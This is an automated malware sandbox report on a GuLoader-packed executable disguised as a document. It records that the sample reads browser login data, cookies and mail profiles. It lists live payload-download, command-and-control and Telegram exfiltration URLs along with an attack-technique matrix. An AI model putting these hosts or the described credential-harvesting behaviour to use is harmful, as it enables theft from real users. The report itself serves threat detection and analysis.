                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, file source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match, file source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
                    Source: Yara match, file source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, file source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR
                    Tactic matrix (techniques per tactic; the number in parentheses is the count the report shows for that technique):

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                    Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                    Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1)
                    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                    Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (2); System Information Discovery (215); Remote System Discovery; System Owner/User Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                    Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                    Command and Control: Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (15); Multiband Communication; Commonly Used Port; Application Layer Protocol
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                    Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                    Source | Detection | Scanner | Label
                    MC8017774DOCS.exe | 42% | ReversingLabs | Win32.Trojan.GuLoader
                    MC8017774DOCS.exe | 49% | Virustotal |
                    MC8017774DOCS.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll | 3% | ReversingLabs |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin | 0% | Avira URL Cloud | safe
                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW | 0% | Avira URL Cloud | safe
                    http://the.drillmmcsnk.top/den/P4.php | 0% | Avira URL Cloud | safe
                    http://the.drillmmcsnk.top | 0% | Avira URL Cloud | safe
                    http://the.drillmmcsnk.top/den/api.php | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    mertvinc.com.tr | 185.244.144.68 | true | false | | high
                    reallyfreegeoip.org | 172.67.177.134 | true | false | | high
                    api.telegram.org | 149.154.167.220 | true | false | | high
                    the.drillmmcsnk.top | 5.182.211.149 | true | false | | unknown
                    checkip.dyndns.com | 132.226.8.169 | true | false | | high
                    checkip.dyndns.org | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    http://the.drillmmcsnk.top/den/P4.php | false | Avira URL Cloud: safe | unknown
                    https://reallyfreegeoip.org/xml/8.46.123.75 | false | | high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin | false | Avira URL Cloud: safe | unknown
                    http://checkip.dyndns.org/ | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://www.office.com/ | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F4E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/chrome_newtab | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/ac/?q= | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://api.telegram.org/bot | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    https://chrome.google.com/webstore?hl=enH | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F18000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW | MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://www.office.com/lB | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F49000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.office.com/H | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.ftp.ftp://ftp.gopher. | MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
                    http://checkip.dyndns.org | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://nsis.sf.net/NSIS_ErrorError | MC8017774DOCS.exe | false | | high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text= | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://chrome.google.com/webstore?hl=en | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F1D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.ecosia.org/newtab/ | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://the.drillmmcsnk.top | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://varders.kozow.com:8081 | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    http://aborters.duckdns.org:8081 | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    https://ac.ecosia.org/autocomplete?q= | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://51.38.247.67:8081/_send_.php?L | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://anotherarmy.dns.army:8081 | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    https://reallyfreegeoip.org/xml/8.46.123.75$ | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DA8000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.org/q | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false | | high
                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
                    https://reallyfreegeoip.org | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://the.drillmmcsnk.top/den/api.php | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | false
                                                                                                        high
                                                                                                        https://reallyfreegeoip.org/xml/MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
185.244.144.68 | mertvinc.com.tr | Turkey | 199608 | BIRBIRTR | false
5.182.211.149 | the.drillmmcsnk.top | Netherlands | 64425 | SKB-ENTERPRISENL | false
172.67.177.134 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1562048
                                                                                                          Start date and time:2024-11-25 07:08:08 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 8m 45s
